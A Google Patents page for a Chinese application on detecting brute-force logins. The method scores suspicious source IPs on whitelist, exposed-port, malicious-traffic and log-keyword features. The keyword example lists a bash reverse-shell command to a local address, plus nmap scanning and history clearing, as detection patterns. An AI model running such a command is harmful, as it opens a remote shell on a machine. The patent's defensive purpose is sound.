CN112688930A - 暴力破解检测方法、系统、设备及介质 - Google Patents
暴力破解检测方法、系统、设备及介质 Download PDFInfo
- Publication number
- CN112688930A CN112688930A CN202011515111.8A CN202011515111A CN112688930A CN 112688930 A CN112688930 A CN 112688930A CN 202011515111 A CN202011515111 A CN 202011515111A CN 112688930 A CN112688930 A CN 112688930A
- Authority
- CN
- China
- Prior art keywords
- address
- suspicious source
- brute force
- level
- dimension
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000005336 cracking Methods 0.000 title claims abstract description 128
- 238000001514 detection method Methods 0.000 title claims abstract description 73
- 230000006399 behavior Effects 0.000 claims abstract description 160
- 238000000034 method Methods 0.000 claims abstract description 23
- 238000005516 engineering process Methods 0.000 abstract description 6
- 238000004458 analytical method Methods 0.000 abstract description 4
- 230000008569 process Effects 0.000 description 9
- 238000012545 processing Methods 0.000 description 9
- 238000004891 communication Methods 0.000 description 6
- 238000010586 diagram Methods 0.000 description 3
- 238000012986 modification Methods 0.000 description 3
- 230000004048 modification Effects 0.000 description 3
- 238000004590 computer program Methods 0.000 description 2
- 238000007405 data analysis Methods 0.000 description 2
- 241000700605 Viruses Species 0.000 description 1
- 238000013473 artificial intelligence Methods 0.000 description 1
- 238000004364 calculation method Methods 0.000 description 1
- 238000011161 development Methods 0.000 description 1
- 230000006870 function Effects 0.000 description 1
- 238000007726 management method Methods 0.000 description 1
- 238000012544 monitoring process Methods 0.000 description 1
- 230000003287 optical effect Effects 0.000 description 1
- 230000002265 prevention Effects 0.000 description 1
- 230000009467 reduction Effects 0.000 description 1
- 238000013515 script Methods 0.000 description 1
- 230000002194 synthesizing effect Effects 0.000 description 1
- 238000013024 troubleshooting Methods 0.000 description 1
Images
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本发明涉及金融科技(Fintech)技术领域,公开了一种暴力破解检测方法、系统、设备及计算机存储介质,包括:获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;获取可疑源IP地址的维度特征,维度特征至少包括两个;根据可疑源IP地址的维度特征确定可疑源IP地址的登录行为是否为暴力破解行为。相较于现有技术中,仅根据登录失败次数是否达到阈值确定IP是否存在暴力破解行为的方案,本发明在根据登录失败次数是否达到阈值确定可疑源IP地址后,根据可疑源IP地址的各个维度特征进行综合分析再确定可疑源IP地址的登录行为是否为暴力破解行为,能够避免单维度判断的片面性和局限性,提升暴力破解检测判断的准确性。
Description
技术领域
本发明涉及金融科技(Fintech)技术领域,尤其涉及暴力破解检测方法、系统、设备及计算机存储介质。
背景技术
随着计算机技术的发展,越来越多的技术(大数据、分布式、人工智能等)应用在金融领域,传统金融业正在逐步向金融科技(Fintech)转变,但由于金融行业的安全性、通用性要求,也对暴力破解检测技术提出了更高的要求。
暴力破解是指攻击者通过系统地组合各种可能的用户验证信息(如登录账户名、密码等),尝试各种可能性来破解用户账户的攻击方式。攻击者常常使用自动化脚本或暴力破解工具进行攻击。由于攻击者会用不同的用户名和密码频繁进行登录尝试,因此在日志中会出现许多登录失败的条目,且这些条目通常来自同一个IP(InternetProtocolAddress,网际协议地址)。
目前主要通过检测登录失败次数是否达到阈值来确定是否存在暴力破解行为,若登录失败次数达到阈值,则进行告警,以使安全运营人员进行告警处理,这种仅通过登录失败次数来进行告警的方式过于片面,很多正常操作也可能会导致登录失败次数达到阈值,例如,同一个IP地址用同一个密码重复登录同一个账户,这种情况可能只是一个还未更新密码或者未获得正确认证的Web/移动应用程序而已,此时系统也会进行误告警,导致安全运营人员需要花费大量的时间在实际并不是暴力破解攻击行为的告警处理上,使真正的暴力破解攻击行为的告警无法得到及时的处理。
发明内容
本发明的主要目的在于提出一种暴力破解检测方法、系统、设备及计算机存储介质,旨在提升暴力破解行为检测的准确性。
为实现上述目的,本发明提供一种暴力破解检测方法,所述暴力破解检测方法包括如下步骤:
获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;
获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。
可选地,所述根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤包括:
确定所述可疑源IP地址的各个维度特征的维度风险等级;
根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为。
可选地,所述可疑源IP地址的维度特征包括白名单特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的白名单特征为所述可疑源IP地址命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第一等级;
若所述可疑源IP地址的白名单特征为所述可疑源IP地址未命中预设IP 白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括外网特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的外网特征为所述可疑源IP地址不存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第一等级;
若所述可疑源IP地址的外网特征为所述可疑源IP地址存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括流量特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设时长内不存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第一等级;
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设检测时长内存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括关键字特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中不包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第一等级;
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤包括:
若所述可疑源IP地址的各个维度特征的维度风险等级之和大于或者等于第一预设等级阈值,确定所述可疑源IP地址的登录行为是高风险暴力破解行为;
若所述可疑源IP地址的各个维度特征的维度风险等级之和,大于第二预设等级阈值且小于所述第一预设等级阈值,确定所述可疑源IP地址的登录行为是中风险暴力破解行为,所述第一预设等级阈值大于第二预设等级阈值;
若所述可疑源IP地址的各个维度特征的维度风险等级之和小于或者等于所述第二预设等级阈值,确定所述可疑源IP地址的登录行为不是暴力破解行为;
所述确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤之后,还包括:
若确定所述可疑源IP地址的登录行为是高风险暴力破解行为,则执行告警操作。
此外,为实现上述目的,本发明还提供一种暴力破解检测系统,所述暴力破解检测系统包括:
IP地址获取模块,用于获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;
维度特征获取模块,用于获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
行为确定模块,用于根据所述可疑源IP地址的维度特征确定所述可疑源 IP地址的登录行为是否为暴力破解行为。
此外,为实现上述目的,本发明还提供一种暴力破解检测设备,所述暴力破解检测设备包括:存储器、处理器及存储在所述存储器上并可在所述处理器上运行的暴力破解检测程序,所述暴力破解检测程序被所述处理器执行时实现如上所述的暴力破解检测方法的步骤。
此外,为实现上述目的,本发明还提供一种计算机存储介质,所述计算机存储介质上存储有暴力破解检测程序,所述暴力破解检测程序被处理器执行时实现如上所述的暴力破解检测方法的步骤。
本发明通过获取预设时长内登录失败次数达到预设次数阈值的可疑源IP 地址;获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。相较于现有技术中,仅根据登录失败次数是否达到阈值确定IP 是否存在暴力破解行为的方案,本发明在根据登录失败次数是否达到阈值确定可疑源IP地址后,根据可疑源IP地址的各个维度特征进行综合分析再确定可疑源IP地址的登录行为是否为暴力破解行为,能够避免单维度判断的片面性和局限性,提升暴力破解检测判断的准确性。
附图说明
图1是本发明实施例方案涉及的硬件运行环境的暴力破解检测设备结构示意图;
图2为本发明暴力破解检测方法第一实施例的流程示意图;
图3为本发明暴力破解检测系统的系统模块示意图。
本发明目的的实现、功能特点及优点将结合实施例,参照附图做进一步说明。
具体实施方式
应当理解,此处所描述的具体实施例仅仅用以解释本发明,并不用于限定本发明。
如图1所示,图1是本发明实施例方案涉及的硬件运行环境的暴力破解检测设备结构示意图。
本发明实施例暴力破解检测设备可以是PC机或服务器设备,其上运行有虚拟机。
如图1所示,该暴力破解检测设备可以包括:处理器1001,例如CPU,网络接口1004,用户接口1003,存储器1005,通信总线1002。其中,通信总线 1002用于实现这些组件之间的连接通信。用户接口1003可以包括显示屏 (Display)、输入单元比如键盘(Keyboard),可选用户接口1003还可以包括标准的有线接口、无线接口。网络接口1004可选的可以包括标准的有线接口、无线接口(如WI-FI接口)。存储器1005可以是高速RAM存储器,也可以是稳定的存储器(non-volatile memory),例如磁盘存储器。存储器1005可选的还可以是独立于前述处理器1001的存储装置。
本领域技术人员可以理解,图1中示出的暴力破解检测设备结构并不构成对设备的限定,可以包括比图示更多或更少的部件,或者组合某些部件,或者不同的部件布置。
如图1所示,作为一种计算机存储介质的存储器1005中可以包括操作系统、网络通信模块、用户接口模块以及暴力破解检测程序。
在图1所示的暴力破解检测设备中,网络接口1004主要用于连接后台服务器,与后台服务器进行数据通信;用户接口1003主要用于连接客户端(用户端),与客户端进行数据通信;而处理器1001可以用于调用存储器1005 中存储的暴力破解检测程序,并执行下述暴力破解检测方法中的操作。
基于上述硬件结构,提出本发明暴力破解检测方法实施例。
参照图2,图2为本发明暴力破解检测方法第一实施例的流程示意图,所述方法包括:
步骤S10,获取预设时长内登录失败次数达到预设次数阈值的可疑源IP 地址;
本实施例暴力破解检测方法运用于暴力破解检测系统中,暴力破解检测系统可以应用于终端、机器人或者PC设备,为方便描述,本实施例以暴力破解检测系统为执行主体。
目前主要通过检测登录失败次数是否达到阈值来确定是否存在暴力破解行为,若登录失败次数达到阈值,则进行告警,以使安全运营人员进行告警处理,这种仅通过登录失败次数来进行告警的方式过于片面,很多正常操作也可能会导致登录失败次数达到阈值,例如,同一个IP地址用同一个密码重复登录同一个账户,这种情况可能只是一个还未更新密码或者未获得正确认证的Web/移动应用程序而已,此时系统也会进行误告警,导致安全运营人员需要花费大量的时间在实际并不是暴力破解攻击行为的告警处理上,使真正的暴力破解攻击行为的告警无法得到及时的处理。
在此背景下,本实施例为追求更准确的暴力破解攻击行为识别检测方案,在根据登录失败次数是否达到阈值确定可疑源IP地址后,根据可疑源IP地址的各个维度特征进行综合分析再确定可疑源IP地址的登录行为是否为暴力破解行为,能够避免单维度判断的片面性和局限性,提升暴力破解检测判断的准确性。
在本实施例中,暴力破解检测系统本身具有日志记录功能,当有远程连接尝试登录本机的管理服务时,暴力破解检测系统会记录一条登录日志,该登录日志中至少包括远程IP的登陆时间、远程IP地址和登陆结果(成功还是失败),当然,该登录日志还可以包括登陆账号、登录持续时长等,例如对于常见的Linux操作系统,其登录日志通常记录在cat/var/log/secure路径下。
暴力破解检测系统能够对登录日志进行监测,确定每一远程IP地址在预设时长内登录失败的次数,将在预设时长内登录失败的次数大于或者等于预设次数阈值的目标远程IP地址确定为可疑源IP地址,该可疑源IP地址可以认为是存在暴力破解嫌疑的可疑IP地址。
可以理解的是,为了避免随着日志数据的增加带来的计算量的增大和运算速率的降低,本实施例在对登录日志进行监测时是采用滑动时间窗口进行的,即,在固定时长的滑动时间窗口内统计相同远程IP地址登陆失败的次数;判断该次数是否超出预设次数阈值;若是,则将该远程IP地址确定为可疑源 IP地址。其中,滑动时间窗口的大小可固定为预设时长。
进一步地,为了提升暴力破解攻击行为检测的准确性,降低后续根据维度特征确定暴力破解攻击行为的检测的数据分析工作量,本实施例在确定可疑源IP地址时,可以是将预设时长内连续登录失败的次数大于或者等于预设次数阈值的目标远程IP地址作为可疑源IP地址。例如,若在预设时长内一远程IP地址共尝试登陆了6次,第1次登陆结果为登陆失败,第2次登陆结果为登陆成功,第3次登陆结果为登陆失败,第4次登陆结果为登陆失败,第5 次登陆结果为登陆成功,第6次登陆结果为登陆失败,则该远程IP地址在预设时长内的连续登录失败的次数为2,而非连续的登陆失败的次数为4,若预设次数阈值为3,则按照非连续登录失败的次数可确定该远程IP地址是可疑源IP地址,但若按照连续登录失败的次数可确定该远程IP地址不是可疑源IP 地址,由于预设时长内的非连续的登陆失败,可能是由于管理人员输入了错误的账号密码导致的,考虑到这种情况,只要有一次登陆结果为登陆成功,就将连续登陆失败的次数清零,从而可以减少可疑源IP地址的数量,进而降低后续根据维度特征确定暴力破解攻击行为的检测的数据分析工作量,提升暴力破解攻击行为检测的准确性。
可以理解的是,本实施例中的暴力破解检测系统中包括HIDS(Host-basedIntrusion Detection System,基于主机型入侵检测系统)。作为计算机系统的监视器和分析器,它并不作用于外部接口,而是专注于系统内部,监视系统全部或部分的动态的行为以及整个计算机系统的状态;HIDS动态地检查网络数据包这一特性,可以检测到哪一个程序访问了什么资源以及确保文字处理器(Word-Processor)不会突然的、无缘无故的启动并修改系统密码数据库。同样的,不管是往内存、文件系统、日志文件还是其它地方存储信息,HIDS 会一直监控系统状态,并且核对他们是否和预期相同。本实施例中确定可疑源IP地址的步骤可以是由HIDS来执行的。
步骤S20,获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
在本实施例中,在确定可疑源IP地址后,即可获取该可疑源IP地址的维度特征,该维度特征包括白名单特征、外网特征、流量特征和关键字特征中的至少两个,可以理解的是,安全运营人员可以根据需要对维度特征进行增加、删除、修改等设置。
所谓白名单特征,指的是可疑源IP地址是否命中预设IP白名单,该预设 IP白名单是由安全运营人员预先根据历史暴力破解检测情况确定的,该预设 IP白名单中包括存在暴力破解行为的可能性较低甚至不可能进行暴力破解行为的IP地址。若可疑源IP地址命中预设IP白名单,则可以认为该可疑源IP 地址进行暴力破解行为的倾向较低,若未命中,则可以认为该可疑源IP地址进行暴力破解行为的倾向较高。本实施例中可疑源IP地址的白名单特征的获取可以是由HIDS来执行的。
进一步地,还可以增设黑名单特征,指的是可疑源IP地址是否命中预设 IP黑名单,顾名思义,该预设IP黑名单中包括存在暴力破解行为的可能性较高的IP地址。若可疑源IP地址命中预设IP黑单,则可以认为该可疑源IP地址进行暴力破解行为的倾向较高,若未命中,则可以认为该可疑源IP地址进行暴力破解行为的倾向较低。
进一步地,本实施例中的暴力破解检测系统中还可以包括NIDS(networkintrusion detection system,网络入侵检测系统)和/或WAF(Web ApplicationFirewall,网站应用级入侵防御系统),其中,NIDS是指对收集漏洞信息、造成拒绝访问及获取超出合法范围的系统控制权等危害计算机系统安全的行为,进行检测的软件与硬件的组合;WAF指的是通过执行一系列针对 HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
所谓外网特征,指的是可疑源IP地址是否存在外网访问端口。外网又称广域网或公网,通常网络安全的防御对象主要是对来自外网的病毒破坏和黑客攻击进行预防、检测以及处理,网络安全的指导思想在于将外网上的非法用户与本机或本机所在的局域网的网络资源相互隔离,从而达到限制外网上的用户非法访问的目的。若可疑源IP地址存在外网访问端口,则可以认为该可疑源IP地址进行暴力破解行为的倾向较高,若可疑源IP地址不存在外网访问端口,则可以认为该可疑源IP地址进行暴力破解行为的倾向较低。本实施例中可疑源IP地址的外网特征的获取可以是由NIDS和/或WAF来执行的。
所谓流量特征,指的是可疑源IP地址在预设检测时长内是否存在被恶意流量攻击的行为。恶意流量指的是通过恶意爬虫、自动机、模拟器等产生的伪造成真实用户向服务器发起的请求,导致服务器“爆满”从而无法正常工作。NIDS和/或WAF能够根据可疑源IP地址确定该IP地址在预设检测时长内是否存在被恶意流量攻击的行为,若可疑源IP地址在预设检测时长内存在被恶意流量攻击的行为,则可以认为该可疑源IP地址进行暴力破解行为的倾向较高,若可疑源IP地址在预设检测时长内不存在被恶意流量攻击的行为,则可以认为该可疑源IP地址进行暴力破解行为的倾向较低。本实施例中可疑源IP地址的外网特征的获取可以是由NIDS和/或WAF来执行的。
所谓关键字特征,指的是可疑源IP地址的日志信息中是否包括预设关键字。NIDS和/或WAF能够根据可疑源IP地址获取可疑源IP地址的bash日志,并对bash日志的内容进行预设关键字检测,预设关键字是由安全运营人员预先设置的。例如,预设关键字可以为“nmap扫描”、“信息收集、查看或者修改mysql历史记录(vim/data/xxx/.mysql history)”、“信息收集、查看或者修改host key(cat known hosts)”、“bash执行反弹shell(bash-i &>/dev/tcp/127.0.0.1/8090 0>&1)”、“clear.history”等中的一个或者多个。若可疑源IP地址的日志信息中包括预设关键字,则可以认为该可疑源IP地址进行暴力破解行为的倾向较高,若可疑源IP地址的日志信息中不包括预设关键字,则可以认为该可疑源IP地址进行暴力破解行为的倾向较低。本实施例中可疑源IP地址的关键字特征的获取可以是由NIDS和/或WAF来执行的。
进一步地,预设关键字特征中还可以包括可疑源IP地址的日志信息中所包括的预设关键字的数量,数量越多,可以认为该可疑源IP地址进行暴力破解行为的倾向越高。
步骤S30,根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。
在本实施例中,在获取到可疑源IP地址的维度特征后,即可综合可疑源 IP地址的各个维度特征确定该可疑源IP地址的登录行为是否为暴力破解行为。
具体地,上述步骤S30具体包括:
步骤a1,确定所述可疑源IP地址的各个维度特征的维度风险等级;
步骤a2,根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为。
在本实施例中,在获取到可疑源IP地址的维度特征后,即可确定每个维度特征对应的维度风险等级,进而确定各个维度特征的维度风险等级之和,根据各个维度特征的维度风险等级之和来确定可疑源IP地址的登录行为是否为暴力破解行为。
在本实施例中,通过获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。相较于现有技术中,仅根据登录失败次数是否达到阈值确定IP是否存在暴力破解行为的方案,本实施例在根据登录失败次数是否达到阈值确定可疑源IP地址后,根据可疑源IP地址的各个维度特征进行综合分析再确定可疑源IP地址的登录行为是否为暴力破解行为,能够避免单维度判断的片面性和局限性,提升暴力破解检测判断的准确性。
进一步地,基于本发明暴力破解检测方法第一实施例,提出本发明暴力破解检测方法第二实施例。
若所述可疑源IP地址的维度特征包括白名单特征,则上述步骤a1包括:
步骤b1,若所述可疑源IP地址的白名单特征为所述可疑源IP地址命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第一等级;
步骤b2,若所述可疑源IP地址的白名单特征为所述可疑源IP地址未命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
在本实施例中,若可疑源IP地址的维度特征包括白名单特征,且白名单特征为可疑源IP地址命中预设IP白名单,则该白名单特征的维度风险等级为第一等级;若白名单特征为可疑源IP地址未命中预设IP白名单,则该白名单特征的维度风险等级为第二等级,其中,第一等级小于第二等级,例如第一等级为0,第二等级为1。
进一步地,若所述可疑源IP地址的维度特征包括外网特征,则上述步骤 a1包括:
步骤c1,若所述可疑源IP地址的外网特征为所述可疑源IP地址不存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第一等级;
步骤c2,若所述可疑源IP地址的外网特征为所述可疑源IP地址存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
在本实施例中,若可疑源IP地址的维度特征包括外网特征,且外网特征为可疑源IP地址不存在外网访问端口,则该外网特征的维度风险等级为第一等级;若外网特征为可疑源IP地址存在外网访问端口,则该外网特征的维度风险等级为第二等级。
进一步地,若可疑源IP地址的维度特征包括流量特征,则上述步骤a1 包括:
步骤d1,若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设时长内不存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第一等级;
步骤d2,若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设检测时长内存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
在本实施例中,若可疑源IP地址的维度特征包括流量特征,且流量特征为可疑源IP地址在预设时长内不存在被恶意流量攻击的行为,则该流量特征的维度风险等级为第一等级;若外网特征为可疑源IP地址在预设时长内存在被恶意流量攻击的行为,则该外网特征的维度风险等级为第二等级。
进一步地,若可疑源IP地址的维度特征包括关键字特征,则上述步骤a1 包括:
步骤e1,若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中不包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第一等级;
步骤e2,若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
在本实施例中,若可疑源IP地址的维度特征包括关键字特征,且关键字特征为可疑源IP地址的日志信息中不包括预设关键字,则该关键字特征的维度风险等级为第一等级;若关键字特征为可疑源IP地址的日志信息中包括预设关键字,则该外网特征的维度风险等级为第二等级。
进一步地,上述步骤a2具体包括:
步骤f1,若所述可疑源IP地址的各个维度特征的维度风险等级之和大于或者等于第一预设等级阈值,确定所述可疑源IP地址的登录行为是高风险暴力破解行为;
步骤f2,若所述可疑源IP地址的各个维度特征的维度风险等级之和,大于第二预设等级阈值且小于所述第一预设等级阈值,确定所述可疑源IP地址的登录行为是中风险暴力破解行为,所述第一预设等级阈值大于第二预设等级阈值;
步骤f3,若所述可疑源IP地址的各个维度特征的维度风险等级之和小于或者等于所述第二预设等级阈值,确定所述可疑源IP地址的登录行为不是暴力破解行为;
进一步地,上述步骤S30之后,还包括:若确定所述可疑源IP地址的登录行为是高风险暴力破解行为,则执行告警操作。
在本实施例中,安全运营人员预先设置了第一预设等级阈值和第二预设等级阈值,第一预设等级阈值大于第二预设等级阈值。若可疑源IP地址的各个维度特征的维度风险等级之和大于或者等于第一预设等级阈值,则确定可疑源IP地址的登录行为是高风险暴力破解行为,即可疑源IP地址的登录行为为暴力破解行为的可能性极高,因此,需要对向预设终端发出告警,以提示安全运营人员及时进行处理。
进一步地,在向预设终端发出告警提示之后,若在预设时长内,安全运营人员未能对该告警进行处理,为尽快对该高风险暴力破解行为处理,暴力破解检测可自动对该可疑源IP地址的登录行为进行拦截,限制该可疑源IP地址的登录。
若可疑源IP地址的各个维度特征的维度风险等级之和,大于第二预设等级阈值且小于第一预设等级阈值,确定可疑源IP地址的登录行为是中风险暴力破解行为,即,可疑源IP地址的登录行为为暴力破解行为的可能性较高风险暴力破解行为而言稍低,但仍有可能是暴力破解行为,因此对于中风险暴力破解行为,也需要向预设终端发出告警,以提示安全运营人员及时进行排查确定,并采取措施。
若可疑源IP地址的各个维度特征的维度风险等级之和小于或者等于第二预设等级阈值,则可以确定可疑源IP地址的登录行为不是暴力破解行为,因此,可不对该可疑源IP地址的登录行为进行告警,以减少误告警,避免安全运营人员花费大量的时间在实际并不是暴力破解攻击行为的告警处理上。
进一步地,为了让安全运营人员能够区分不同风险的暴力破解行为,在对高风险暴力破解行为和中风险暴力破解行为进行告警时,可采用不同的告警手段以告知安全运营人员当前告警的紧急程度,例如,可为高风险暴力破解行为设置较短的处理时限,要求安全运营人员及时处理,例如高风险暴力破解行的处理时限可设置为5分钟;可为中风险暴力破解行为设置稍长的处理时限,例如中风险暴力破解行的处理时限可设置为2小时。
本发明还提供一种暴力破解检测系统,参照图3,所述暴力破解检测系统包括:
IP地址获取模块10,用于获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;
维度特征获取模块20,用于获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
行为确定模块30,用于根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。
可选地,所述行为确定模块,还用于:
确定所述可疑源IP地址的各个维度特征的维度风险等级;
根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为。
可选地,所述可疑源IP地址的维度特征包括白名单特征;
所述行为确定模块,还用于:
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的白名单特征为所述可疑源IP地址命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第一等级;
若所述可疑源IP地址的白名单特征为所述可疑源IP地址未命中预设IP 白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括外网特征;
所述行为确定模块,还用于:
若所述可疑源IP地址的外网特征为所述可疑源IP地址不存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第一等级;
若所述可疑源IP地址的外网特征为所述可疑源IP地址存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括流量特征;
所述行为确定模块,还用于:
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设时长内不存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第一等级;
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设检测时长内存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述可疑源IP地址的维度特征包括关键字特征;
所述行为确定模块,还用于:
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中不包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第一等级;
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
可选地,所述行为确定模块,还用于:
若所述可疑源IP地址的各个维度特征的维度风险等级之和大于或者等于第一预设等级阈值,确定所述可疑源IP地址的登录行为是高风险暴力破解行为;
若所述可疑源IP地址的各个维度特征的维度风险等级之和,大于第二预设等级阈值且小于所述第一预设等级阈值,确定所述可疑源IP地址的登录行为是中风险暴力破解行为,所述第一预设等级阈值大于第二预设等级阈值;
若所述可疑源IP地址的各个维度特征的维度风险等级之和小于或者等于所述第二预设等级阈值,确定所述可疑源IP地址的登录行为不是暴力破解行为;
可选地,所述行为确定模块,还用于:
若确定所述可疑源IP地址的登录行为是高风险暴力破解行为,则执行告警操作。
上述各程序单元所执行的方法可参照本发明暴力破解检测方法各个实施例,此处不再赘述。
本发明还提供一种暴力破解检测设备,暴力破解检测设备包括:存储器、处理器及存储在存储器上并可在处理器上运行的暴力破解检测程序,暴力破解检测程序被处理器执行时所实现的方法可参照本发明暴力破解检测方法各个实施例,此处不再赘述。
本发明还提供一种计算机存储介质。
本发明计算机存储介质上存储有暴力破解检测程序,所述暴力破解检测程序被处理器执行时实现如上所述的暴力破解检测方法的步骤。
其中,在所述处理器上运行的暴力破解检测程序被执行时所实现的方法可参照本发明暴力破解检测方法各个实施例,此处不再赘述。
需要说明的是,在本文中,术语“包括”、“包含”或者其任何其他变体意在涵盖非排他性的包含,从而使得包括一系列要素的过程、方法、物品或者系统不仅包括那些要素,而且还包括没有明确列出的其他要素,或者是还包括为这种过程、方法、物品或者系统所固有的要素。在没有更多限制的情况下,由语句“包括一个……”限定的要素,并不排除在包括该要素的过程、方法、物品或者系统中还存在另外的相同要素。
上述本发明实施例序号仅仅为了描述,不代表实施例的优劣。
通过以上的实施方式的描述,本领域的技术人员可以清楚地了解到上述实施例方法可借助软件加必需的通用硬件平台的方式来实现,当然也可以通过硬件,但很多情况下前者是更佳的实施方式。基于这样的理解,本发明的技术方案本质上或者说对现有技术做出贡献的部分可以以软件产品的形式体现出来,该计算机软件产品存储在如上所述的一个存储介质(如ROM/RAM、磁碟、光盘)中,包括若干指令用以使得一台终端设备(可以是手机,计算机,服务器,空调器,或者网络设备等)执行本发明各个实施例所述的方法。
以上仅为本发明的优选实施例,并非因此限制本发明的专利范围,凡是利用本发明说明书及附图内容所作的等效结构或等效流程变换,或直接或间接运用在其他相关的技术领域,均同理包括在本发明的专利保护范围内。
Claims (10)
1.一种暴力破解检测方法,其特征在于,所述暴力破解检测方法包括如下步骤:
获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;
获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。
2.如权利要求1所述的暴力破解检测方法,其特征在于,所述根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤包括:
确定所述可疑源IP地址的各个维度特征的维度风险等级;
根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为。
3.如权利要求2所述的暴力破解检测方法,其特征在于,所述可疑源IP地址的维度特征包括白名单特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的白名单特征为所述可疑源IP地址命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第一等级;
若所述可疑源IP地址的白名单特征为所述可疑源IP地址未命中预设IP白名单,则所述可疑源IP地址的白名单特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
4.如权利要求2所述的暴力破解检测方法,其特征在于,所述可疑源IP地址的维度特征包括外网特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
